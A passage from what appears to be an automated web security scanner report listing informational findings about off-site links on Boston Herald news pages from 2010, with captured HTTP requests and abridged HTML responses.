http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fpolice_logs%2F&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://cache.heraldinteractive.com/images/siteImages/crime_map/crime_map_tease1.jpg
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/police_logs/
http://multimedia.heraldinteractive.com/images/20101027/stp/a16946_Papi_10282010.jpg
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /news/police_logs/?srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:03:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>



<link rel="alternate" title="Police Blotter - News & Opinion - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/police_logs/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fpolice_logs%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<iframe style="position: relative; margin-bottom: 16px;" src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
<a href="http://www.bostonherald.com/news/crime_map/"><img src="http://cache.heraldinteractive.com/images/siteImages/crime_map/crime_map_tease1.jpg"></a>
...[SNIP]...
<div style="display:none;">
<iframe src="http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:300px;" allowTransparency="true"></iframe>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<br/>
No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.29. http://bostonherald.com/news/politics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/politics/

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/news/politics/?position=0

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fpolitics%2F%3Fsrvc%3Dhome%26position%3D4&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/reporters/howie_carr.gif
http://cache.heraldinteractive.com/images/siteImages/reporters/margery_eagan.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxDollars177.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniPoll.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/politics/
http://multimedia.heraldinteractive.com/images/20101104/stp/2e97af_Toll_11052010.jpg
http://multimedia.heraldinteractive.com/images/20101104/stp/3781c6_Brown_11052010.jpg
http://multimedia.heraldinteractive.com/images/20101104/stp/7425ab_Deval_11052010.jpg
http://multimedia.heraldinteractive.com/images/20101104/stp/8adc0e_Baker_09162010.JPG
http://multimedia.heraldinteractive.com/images/20101105/stp/6d5d99_barney_11062010.jpg
http://multimedia.heraldinteractive.com/images/20101105/stp/95d5a5_Yacht_11062010.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/6fb9d3_limo_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/b47174_Tax_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/e9e879_barneyf_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/fb307e_110610cahillfn03.JPG
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /news/politics/?position=0 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:18:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 60116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>



   <link rel="alternate" title="Local Politics - News & Opinion - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/politics/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fpolitics%2F%3Fsrvc%3Dhome%26position%3D4&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries </a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif"> <a class="orange" style="font-weight:bold" href="/rss">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif"> <a class="orange" style="font-weight:bold" href="/users/register/">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif"> <a class="orange" style="font-weight:bold" href="/mobile/info.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif"> <a class="orange" style="font-weight:bold" href="/about/contact/news_tip.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif"> <a class="orange" style="font-weight:bold" href="/about/home_delivery/">
...[SNIP]...
<a href="/news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/fb307e_110610cahillfn03.JPG" alt="Independent Tim Cahill, at home in Quincy, says the negative GOP ad blitz actually helped Democrat Deval Patrick prevail in the race for governor."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniPoll.gif" alt="Comments"><a href="/news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/srvc=ma2004&position=">
...[SNIP]...
<a href="/news/politics/view/20101107moneybags_menino/"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/e9e879_barneyf_11072010.jpg" alt="ALERT THE MEDIA: A pack of journalists surrounds U.S. Rep. Barney Frank during his post-election victory address election night in Newton."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="/news/politics/view/20101107moneybags_menino/srvc=ma2004&position=">
...[SNIP]...
<a href="/news/politics/view/20101107ads_fueled_victory_of_question_1/"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/b47174_Tax_11072010.jpg" alt="CHEERS: Local PR firm Rasky Baerlein Strategic Communications was successful in the effort to repeal the Bay State’s alcohol sales tax - supported by package store owner Steve Rubin, above - by running humorous ads."></a>
...[SNIP]...
<a href="/news/politics/view/20101106towns_high_and_dry_on_boat_taxes_experts_excise_laws_favor_john_kerry_other_bay_state_owners/"><img src="http://multimedia.heraldinteractive.com/images/20101105/stp/95d5a5_Yacht_11062010.jpg" alt="DOCKED PAYMENTS: A statewide audit of the current tax system shows that the state uses an ‘antiquated’  system to assess the value of boats such as U.S. Sen. John F. Kerry’s $7 million yacht, above."></a>
...[SNIP]...
<a href="/news/politics/view/20101106state__tied_into_probe_sec_eyes_hedge_fund_backed_by_barney_frank_pal/"><img src="http://multimedia.heraldinteractive.com/images/20101105/stp/6d5d99_barney_11062010.jpg" alt="Barney Frank pal S. Donald Sussman."></a>
...[SNIP]...
<a href="/news/politics/view/20101105gov_devap_patrick_confident_in_supreme_judicial_court_chief_pick/"><img src="http://multimedia.heraldinteractive.com/images/20101104/stp/7425ab_Deval_11052010.jpg" alt="MILESTONE: Justice Roderick Ireland was  nominated by Deval Patrick to serve as chief justice of the Massachusetts Supreme Court yesterday at the State House."></a>
...[SNIP]...
<a href="/news/politics/view/20101105new_hires_take_toll_on_budget_at_least_40_seasonal_workers_tapped/"><img src="http://multimedia.heraldinteractive.com/images/20101104/stp/2e97af_Toll_11052010.jpg" alt="TAKING THE MONEY: Gov. Deval Patrick has hired at least 40 new seasonal toll takers, who will stay on the payroll until Jan. 15."></a>
...[SNIP]...
<a href="/news/politics/view/20101105democrats_pledge_to_bring_down_scott_brown_in_2012/"><img src="http://multimedia.heraldinteractive.com/images/20101104/stp/3781c6_Brown_11052010.jpg" alt="PROUD: Sen. Scott Brown hands the Outstanding Women’s Veteran Award to Capt. Mary Jo Majors during a ceremony at the State House honoring female veterans."></a>
...[SNIP]...
<a href="/news/politics/view/20101105charlie_baker_expresses_regret_disappointment_in_e-mail/"><img src="http://multimedia.heraldinteractive.com/images/20101104/stp/8adc0e_Baker_09162010.JPG" alt="Charlie Baker"></a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1294586"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/6fb9d3_limo_11072010.jpg" alt="Local Coverage" /></a>
...[SNIP]...
</div>

<iframe style="position: relative; margin-bottom: 16px;" src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</h1>
                    <img style="width:50px; height:50px; padding:5px; background-color:#ddd; border:none" src="http://cache.heraldinteractive.com/images/siteImages/reporters/howie_carr.gif" alt="Howie Carr" />
                <div class="byline">
...[SNIP]...
</h1>
                    <img style="width:50px; height:50px; padding:5px; background-color:#ddd; border:none" src="http://cache.heraldinteractive.com/images/siteImages/reporters/margery_eagan.gif" alt="Margery Eagan" />
                <div class="byline">
...[SNIP]...
<div style="margin:0 0 20px 0; line-height:16px; width:310px">
<img style="float:left; margin:0 5px 0 0; clear:both" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxDollars177.gif">
<span class="bold">
...[SNIP]...
<div style="display:none;">
<iframe src="http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:300px;" allowTransparency="true"></iframe>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<br/>
        No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.30. http://bostonherald.com/news/politics/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/politics/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/news/politics/view.bg?articleid=1294589&srvc=home&position=active

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fpolitics%2Fview%2F20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy%2Fsrvc%3Dnews%26position%3Dalso&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/reporters/jessicaFargen.jpg
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/politics/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20101104/stp/1536f2_Cahill_10022010.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/e9e879_barneyf_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101107/fb307e_110610cahillfn03.JPG
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ

Request

GET /news/politics/view.bg?articleid=1294589&srvc=home&position=active HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:10:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fpolitics%2Fview%2F20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy%2Fsrvc%3Dnews%26position%3Dalso&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Tim Cahill: Attacks ‘backfired’');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/news/politics/view.bg?articleid=1294589&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(234) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:none">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101107/fb307e_110610cahillfn03.JPG" alt="Independent Tim Cahill, at home in..." /></div>
...[SNIP]...
<a href="/news/politics/view/20101107moneybags_menino/"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/e9e879_barneyf_11072010.jpg" alt="Moneybags Menino" /></a>
...[SNIP]...
<a href="/news/politics/view/20101104tim_cahill_former_aides_quietly_settle_sabotage_suit/"><img src="http://multimedia.heraldinteractive.com/images/20101104/stp/1536f2_Cahill_10022010.jpg" alt="Tim Cahill, former aides quietly settle sabotage suit" /></a>
...[SNIP]...

<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fpolitics%2Fview%2F20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy%2Fsrvc%3Dnews%26position%3Dalso&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
